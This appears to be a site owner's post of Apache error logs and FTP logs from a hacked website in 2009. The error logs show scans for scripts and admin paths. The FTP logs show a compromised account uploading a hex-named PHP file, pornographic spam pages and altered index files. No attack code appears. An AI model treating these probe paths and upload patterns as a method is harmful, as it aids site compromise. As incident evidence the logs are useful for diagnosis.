[Mon Apr 20 00:12:34 2009] [error] [client 62.212.66.5] File does not exist: /var/www/vhosts/my_site.com/httpdocs/administrator

[client 208.74.66.43] script '/var/www/vhosts/my_site.com/httpdocs/phpinfo.php' not found or unable to stat

[Mon Apr 20 03:06:38 2009] [error] [client 72.30.142.169] File does not exist: /var/www/vhosts/my_site.com/httpdocs/downloads/_images
[Mon Apr 20 03:10:11 2009] [error] [client 72.30.142.169] File does not exist: /var/www/vhosts/my_site.com/httpdocs/downloads/_images
[Mon Apr 20 03:13:20 2009] [error] [client 121.101.159.16] File does not exist: /var/www/vhosts/my_site.com/httpdocs/components
[Mon Apr 20 03:13:20 2009] [error] [client 121.101.159.16] File does not exist: /var/www/vhosts/my_site.com/httpdocs/forum/components
[Mon Apr 20 03:29:58 2009] [error] [client 208.116.45.210] File does not exist: /var/www/vhosts/my_site.com/httpdocs/components

[Mon Apr 20 05:19:21 2009] [error] [client 72.30.142.169] File does not exist: /var/www/vhosts/my_site.com/httpdocs/downloads/at_domains__index.html
[client 66.90.73.113] script '/var/www/vhosts/my_site.com/httpdocs/forum/headline.php' not found or unable to stat
[client 66.90.73.113] script '/var/www/vhosts/my_site.com/httpdocs/headline.php' not found or unable to stat
[client 66.90.73.113] script '/var/www/vhosts/my_site.com/httpdocs/headline.php' not found or unable to stat
[client 66.90.73.113] script '/var/www/vhosts/my_site.com/httpdocs/forum/headline.php' not found or unable to stat
[client 66.90.73.113] script '/var/www/vhosts/my_site.com/httpdocs/headline.php' not found or unable to stat
[client 66.90.73.113] script '/var/www/vhosts/my_site.com/httpdocs/forum/headline.php' not found or unable to stat
[Mon Apr 20 05:21:54 2009] [error] [client 115.178.120.133] File does not exist: /var/www/vhosts/my_site.com/httpdocs/(null)
[Mon Apr 20 05:22:22 2009] [error] [client 72.30.142.169] File does not exist: /var/www/vhosts/my_site.com/httpdocs/downloads/_images

[Mon Apr 20 05:35:42 2009] [error] [client 62.171.194.9] File does not exist: /var/www/vhosts/my_site.com/httpdocs/_vti_bin
[Mon Apr 20 05:35:43 2009] [error] [client 62.171.194.9] File does not exist: /var/www/vhosts/my_site.com/httpdocs/MSOffice

[client 69.89.31.173] script '/var/www/vhosts/my_site.com/httpdocs/errors.php' not found or unable to stat
[client 69.89.31.173] script '/var/www/vhosts/my_site.com/httpdocs/forum/errors.php' not found or unable to stat

[Mon Apr 20 07:59:59 2009] [error] [client 72.30.142.169] File does not exist: /var/www/vhosts/my_site.com/httpdocs/downloads/_images
[Mon Apr 20 08:00:16 2009] [error] [client 66.249.70.108] File does not exist: /var/www/vhosts/my_site.com/httpdocs/ladies

And my unexplained FTP logs (short summary):

hack started april 16th 2008, and files uploaded on 18th

Thu Apr 16 20:32:58 2009 0 94.236.129.194 32 /var/www/vhosts/my_site.com/httpdocs/testfile123.html b _ i r socie2 ftp 0 * c
Thu Apr 16 20:33:24 2009 0 94.236.129.194 32 /var/www/vhosts/my_site.com/httpdocs/testfile123.html b _ d r socie2 ftp 0 * c
Thu Apr 16 21:07:58 2009 0 71.201.58.77 32 /var/www/vhosts/my_site.com/httpdocs/ladies/testfile123.html b _ i r socie2 ftp 0 * c
Thu Apr 16 21:08:01 2009 0 71.201.58.77 32 /var/www/vhosts/my_site.com/httpdocs/ladies/testfile123.html b _ d r socie2 ftp 0 * c
Thu Apr 16 21:08:03 2009 0 71.201.58.77 795 /var/www/vhosts/my_site.com/httpdocs/ladies/b282a0a7e598.php b _ i r socie2 ftp 0 * c
Thu Apr 16 21:08:04 2009 0 71.201.58.77 795 /var/www/vhosts/my_site.com/httpdocs/ladies/b282a0a7e598.php b _ d r socie2 ftp 0 * c
Sat Apr 18 07:03:55 2009 1 83.10.40.16 19694 /var/www/vhosts/my_site.com/httpdocs/ladies/index.html b _ i r socie2 ftp 0 * c
Sat Apr 18 07:03:58 2009 0 83.10.40.16 7025 /var/www/vhosts/my_site.com/httpdocs/ladies/index.css b _ i r socie2 ftp 0 * c
Sat Apr 18 07:04:00 2009 0 83.10.40.16 180 /var/www/vhosts/my_site.com/httpdocs/ladies/border_h.png b _ i r socie2 ftp 0 * c
Sat Apr 18 07:04:10 2009 7 83.10.40.16 105162 /var/www/vhosts/my_site.com/httpdocs/ladies/map.html b _ i r socie2 ftp 0 * c
Sat Apr 18 07:04:12 2009 0 83.10.40.16 3341 /var/www/vhosts/my_site.com/httpdocs/ladies/rss.png b _ i r socie2 ftp 0 * c
Sat Apr 18 07:04:15 2009 1 83.10.40.16 8998 /var/www/vhosts/my_site.com/httpdocs/ladies/britney-spears-bear-vagina.html b _ i r socie2 ftp 0 * c

Sat Apr 18 07:56:40 2009 1 62.221.111.249 7821 /var/www/vhosts/my_site.com/httpdocs/ladies/britney-spears-******-out.html b _ i r socie2 ftp 0 * c
Sat Apr 18 07:56:40 2009 0 88.158.221.98 872 /var/www/vhosts/my_site.com/httpdocs/tutorials/index.php a _ o r socie2 ftp 0 * c
Sat Apr 18 07:56:42 2009 0 88.158.221.98 3220 /var/www/vhosts/my_site.com/httpdocs/tutorials/index.php a _ i r socie2 ftp 0 * c
Sat Apr 18 07:56:44 2009 0 88.158.221.98 15035 /var/www/vhosts/my_site.com/httpdocs/my_forum/index.php a _ o r socie2 ftp 0 * c
Sat Apr 18 07:56:46 2009 1 62.221.111.249 17189 /var/www/vhosts/my_site.com/httpdocs/ladies/britney-on-black-dick.html b _ i r socie2 ftp 0 * c
Sat Apr 18 07:56:50 2009 0 88.158.221.98 17335 /var/www/vhosts/my_site.com/httpdocs/my_forum/index.php a _ i r socie2 ftp 0 * c
Sat Apr 18 07:56:51 2009 0 88.158.221.98 6333 /var/www/vhosts/my_site.com/httpsdocs/index.html a _ o r socie2 ftp 0 * c
Sat Apr 18 07:56:52 2009 1 62.221.111.249 10030 /var/www/vhosts/my_site.com/httpdocs/ladies/britney-cock-spear-sucking.html b _ i r socie2 ftp 0 * c
Sat Apr 18 07:56:53 2009 0 88.158.221.98 8574 /var/www/vhosts/my_site.com/httpsdocs/index.html a _ i r socie2 ftp 0 * c
Sat Apr 18 07:56:59 2009 1 62.221.111.249 11087 /var/www/vhosts/my_site.com/httpdocs/ladies/britney-spears-photo-nude.html b _ i r socie2 ftp 0 * c

Sat Apr 18 08:14:07 2009 1 62.221.111.249 14188 /var/www/vhosts/my_site.com/httpdocs/ladies/sex-with-underwear-on.html b _ i r socie2 ftp 0 * c
Sat Apr 18 15:07:31 2009 0 89.238.10.109 5817 /var/www/vhosts/my_site.com/httpdocs/index.shtml a _ o r socie2 ftp 0 * c
Sat Apr 18 15:07:41 2009 0 89.238.10.109 5979 /var/www/vhosts/my_site.com/httpdocs/index.shtml a _ i r socie2 ftp 0 * c
Sat Apr 18 15:07:52 2009 7 89.238.10.109 21907 /var/www/vhosts/my_site.com/httpdocs/ladies/index.html a _ o r socie2 ftp 0 * c
Sat Apr 18 15:08:03 2009 2 89.238.10.109 22047 /var/www/vhosts/my_site.com/httpdocs/ladies/index.html a _ i r socie2 ftp 0 * c
Sat Apr 18 15:08:06 2009 0 89.238.10.109 3220 /var/www/vhosts/my_site.com/httpdocs/tutorials/index.php a _ o r socie2 ftp 0 * c
Sat Apr 18 15:08:09 2009 0 89.238.10.109 3123 /var/www/vhosts/my_site.com/httpdocs/tutorials/index.php a _ i r socie2 ftp 0 * c
Sat Apr 18 15:08:15 2009 1 89.238.10.109 17335 /var/www/vhosts/my_site.com/httpdocs/my_forum/index.php a _ o r socie2 ftp 0 * c
Sat Apr 18 15:08:23 2009 1 89.238.10.109 17354 /var/www/vhosts/my_site.com/httpdocs/my_forum/index.php a _ i r socie2 ftp 0 * c
Sat Apr 18 15:08:34 2009 6 89.238.10.109 8574 /var/www/vhosts/my_site.com/httpsdocs/index.html a _ o r socie2 ftp 0 * c
Sat Apr 18 15:08:37 2009 0 89.238.10.109 8689 /var/www/vhosts/my_site.com/httpsdocs/index.html a _ i r socie2 ftp 0 * c